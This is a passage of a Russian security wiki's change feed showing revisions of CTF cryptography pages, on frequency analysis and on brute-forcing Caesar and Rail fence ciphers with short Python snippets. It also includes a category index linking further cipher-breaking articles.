Примерный алгоритм при анализе текста частотным анализом таков:&lt;br /&gt;
* Подсчет количества всех символов в тексте&lt;br /&gt;
* В соответствии с частотами заменить буквы на позициях в тексте&lt;br /&gt;
&lt;br /&gt;
Поскольку частотный анализ это метод основан на вероятностях, то не всегда возможное появление буквы в тексте будет соответствовать общепринятой частоте появления букв. Также успех зачастую зависит от размера самого текста, чем он больше - тем выше вероятность определить верную частоту букв.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Для анализа текстов на некоторых языках можно воспользоватся утилитой [http://www.mcld.co.uk/decipher/]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=192</id>
		<title>Частотный анализ</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=192"/>
				<updated>2016-02-08T13:39:54Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Считается, что в каждом раговорном языке для встречаемых в тексте букв есть определенная величина частоты. Также частота на комбинации двух, трех и четырех букв. &lt;br /&gt;
&lt;br /&gt;
Таблица соответствия частот букв для некоторых европейских языков&lt;br /&gt;
&lt;br /&gt;
[[Файл:Table.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Примерный алгоритм при анализе текста частотным анализом таков:&lt;br /&gt;
* Подсчет количества всех символов в тексте&lt;br /&gt;
* В соответствии с частотами заменить буквы на позициях в тексте&lt;br /&gt;
&lt;br /&gt;
Поскольку частотный анализ это метод основан на вероятностях, то не всегда возможное появление буквы в тексте будет соответствовать общепринятой частоте появления букв. Также успех зачастую зависит от размера самого текста, чем он больше - тем выше вероятность определить верную частоту букв.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=191</id>
		<title>Частотный анализ</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=191"/>
				<updated>2016-02-08T13:32:24Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Считается, что в каждом раговорном языке для встречаемых в тексте букв есть определенная величина частоты. Также частота на комбинации двух, трех и четырех букв. &lt;br /&gt;
&lt;br /&gt;
Таблица соответствия частот букв для некоторых европейских языков&lt;br /&gt;
&lt;br /&gt;
[[Файл:Table.png]]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%A4%D0%B0%D0%B9%D0%BB:Table.png&amp;diff=190</id>
		<title>Файл:Table.png</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%A4%D0%B0%D0%B9%D0%BB:Table.png&amp;diff=190"/>
				<updated>2016-02-08T13:32:06Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=189</id>
		<title>Частотный анализ</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%A7%D0%B0%D1%81%D1%82%D0%BE%D1%82%D0%BD%D1%8B%D0%B9_%D0%B0%D0%BD%D0%B0%D0%BB%D0%B8%D0%B7&amp;diff=189"/>
				<updated>2016-02-08T13:31:31Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: Новая страница: «Считается, что в каждом раговорном языке для встречаемых в тексте букв есть определенна…»&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Считается, что в каждом раговорном языке для встречаемых в тексте букв есть определенная величина частоты. Также частота на комбинации двух, трех и четырех букв. &lt;br /&gt;
&lt;br /&gt;
Таблица соответствия частот букв для некоторых европейских языков&lt;br /&gt;
&lt;br /&gt;
[[Файл:http://webspec.su/wiki/table.png]]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=188</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=188"/>
				<updated>2016-02-08T13:18:43Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Vigenere_cipher|Взлом Vigenere cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:Частотный_анализ|Частотный анализ]]&lt;br /&gt;
&lt;br /&gt;
[[:CBC_padding_oracle|CBC padding oracle]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_MT19937_stream_cipher|Взлом MT19937 stream cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=187</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=187"/>
				<updated>2016-02-08T13:17:18Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Vigenere_cipher|Взлом Vigenere cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:Частотный_анализ|Частотный анализ]]&lt;br /&gt;
&lt;br /&gt;
[[:CBC_padding_oracle|CBC padding oracle]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=186</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=186"/>
				<updated>2016-02-08T13:16:37Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Vigenere_cipher|Взлом Vigenere cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:Частотный_анализ|Частотный анализ]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=185</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=185"/>
				<updated>2016-02-08T13:03:55Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Vigenere_cipher|Взлом Vigenere cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher&amp;diff=184</id>
		<title>Взлом Ceasar cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher&amp;diff=184"/>
				<updated>2016-02-08T13:01:01Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр Цезаря — это вид шифра подстановки, в котором каждый символ в открытом тексте заменяется символом, находящимся на некотором постоянном числе позиций левее или правее него в алфавите.&lt;br /&gt;
&lt;br /&gt;
Взлом данного шифра происходит методом перебора всех возможных сдвигов. Для этого можно использовать инструмент [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript Automatic Caesar cipher breaker] либо код на python, в котором строка '''Wkh_Txlfn_Eurzq_Ira_Mxpsv_Ryhu_Wkh_Odcb_Grj''' является зашифрованной:&lt;br /&gt;
&lt;br /&gt;
   a = 'Wkh_Txlfn_Eurzq_Ira_Mxpsv_Ryhu_Wkh_Odcb_Grj'&lt;br /&gt;
   import string&lt;br /&gt;
   def rotn(n):&lt;br /&gt;
       from string import ascii_lowercase as lc, ascii_uppercase as uc&lt;br /&gt;
       mapping = string.maketrans(lc + uc, lc[n:] + lc[:n] + uc[n:] + uc[:n])&lt;br /&gt;
       return mapping&lt;br /&gt;
   for n in xrange(26):&lt;br /&gt;
      a.translate(rotn(n))&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=183</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=183"/>
				<updated>2016-02-08T12:54:27Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=182</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=182"/>
				<updated>2016-02-08T12:54:17Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher&amp;diff=181</id>
		<title>Взлом Ceasar cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher&amp;diff=181"/>
				<updated>2016-02-08T12:52:03Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: Новая страница: «Шифр Цезаря — это вид шифра подстановки, в котором каждый символ в открытом тексте замен…»&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр Цезаря — это вид шифра подстановки, в котором каждый символ в открытом тексте заменяется символом, находящимся на некотором постоянном числе позиций левее или правее него в алфавите.&lt;br /&gt;
&lt;br /&gt;
Взлом данного шифра происходит методом перебора позиции символов. Для этого можно использовать инструмент [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript Automatic Caesar cipher breaker]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=180</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=180"/>
				<updated>2016-02-08T12:21:00Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=179</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=179"/>
				<updated>2016-02-08T12:20:49Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Ceasar_cipher|Взлом Ceasar cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=178</id>
		<title>Категория:Crypto</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Crypto&amp;diff=178"/>
				<updated>2016-02-08T12:08:02Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: /* Инструментарий для работы */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Список статей по криптографии для решения CTF соревнований.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Инструментарий для работы ==&lt;br /&gt;
[[:%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher|Взлом Rail Fence cipher]]&lt;br /&gt;
&lt;br /&gt;
== Внешние ссылки ==&lt;br /&gt;
&lt;br /&gt;
[https://www.picoctf.com/crypto_mats/index.html Introduction to Cryptography]&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=177</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=177"/>
				<updated>2016-02-08T11:53:30Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' относится к перестановочным шифрам и взламывается методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;br /&gt;
&lt;br /&gt;
== Пример ==&lt;br /&gt;
Имеется зашифрованная строка:&lt;br /&gt;
     AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     #!/usr/bin/python&lt;br /&gt;
     from railFence import decryptRailFence&lt;br /&gt;
     for i in xrange(1,255):&lt;br /&gt;
          print decryptRailFence(&amp;quot;AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&amp;quot;, i, 0); &lt;br /&gt;
&lt;br /&gt;
После запуска, просматривая вывод, можно найти строку: &lt;br /&gt;
     A-fence-is-a-structure-that-encloses-an-area,-SharifCTF{QmFzZTY0IGlzIGEgZ2VuZXJpYyB0ZXJt},-typically-outdoors.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=176</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=176"/>
				<updated>2016-02-08T11:45:41Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' взламывается методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;br /&gt;
&lt;br /&gt;
== Пример ==&lt;br /&gt;
Имеется зашифрованная строка:&lt;br /&gt;
     AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     #!/usr/bin/python&lt;br /&gt;
     from railFence import decryptRailFence&lt;br /&gt;
     for i in xrange(1,255):&lt;br /&gt;
          print decryptRailFence(&amp;quot;AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&amp;quot;, i, 0); &lt;br /&gt;
&lt;br /&gt;
После запуска, просматривая вывод, можно найти строку: &lt;br /&gt;
     A-fence-is-a-structure-that-encloses-an-area,-SharifCTF{QmFzZTY0IGlzIGEgZ2VuZXJpYyB0ZXJt},-typically-outdoors.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=175</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=175"/>
				<updated>2016-02-08T11:45:08Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;br /&gt;
&lt;br /&gt;
== Пример ==&lt;br /&gt;
Имеется зашифрованная строка:&lt;br /&gt;
     AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     #!/usr/bin/python&lt;br /&gt;
     from railFence import decryptRailFence&lt;br /&gt;
     for i in xrange(1,255):&lt;br /&gt;
          print decryptRailFence(&amp;quot;AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&amp;quot;, i, 0); &lt;br /&gt;
&lt;br /&gt;
После запуска, просматривая вывод, можно найти строку: &lt;br /&gt;
     A-fence-is-a-structure-that-encloses-an-area,-SharifCTF{QmFzZTY0IGlzIGEgZ2VuZXJpYyB0ZXJt},-typically-outdoors.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=174</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=174"/>
				<updated>2016-02-08T11:44:53Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;br /&gt;
&lt;br /&gt;
== Пример ==&lt;br /&gt;
Имеется зашифрованная строка:&lt;br /&gt;
AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     #!/usr/bin/python&lt;br /&gt;
     from railFence import decryptRailFence&lt;br /&gt;
     for i in xrange(1,255):&lt;br /&gt;
          print decryptRailFence(&amp;quot;AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&amp;quot;, i, 0); &lt;br /&gt;
&lt;br /&gt;
После запуска, просматривая вывод, можно найти строку: &lt;br /&gt;
A-fence-is-a-structure-that-encloses-an-area,-SharifCTF{QmFzZTY0IGlzIGEgZ2VuZXJpYyB0ZXJt},-typically-outdoors.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
		<id>http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=173</id>
		<title>Взлом Rail fence cipher</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC_Rail_fence_cipher&amp;diff=173"/>
				<updated>2016-02-08T11:44:21Z</updated>
		
		<summary type="html">&lt;p&gt;ComAT0Zz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Шифр '''Rail fence''' методом перебора. Для реализации можно использовать инструмент [https://github.com/TimCinel/RailFencePython RailFencePython], модифицировав тестовый файл '''testRailFence.py'''&lt;br /&gt;
&lt;br /&gt;
== Пример ==&lt;br /&gt;
Имеется зашифрованная строка:&lt;br /&gt;
AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     #!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
     from railFence import decryptRailFence&lt;br /&gt;
&lt;br /&gt;
     for i in xrange(1,255):&lt;br /&gt;
          print decryptRailFence(&amp;quot;AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ-&amp;quot;, i, 0); &lt;br /&gt;
&lt;br /&gt;
После запуска, просматривая вывод, можно найти строку: &lt;br /&gt;
A-fence-is-a-structure-that-encloses-an-area,-SharifCTF{QmFzZTY0IGlzIGEgZ2VuZXJpYyB0ZXJt},-typically-outdoors.&lt;/div&gt;</summary>
		<author><name>ComAT0Zz</name></author>	</entry>

	<entry>
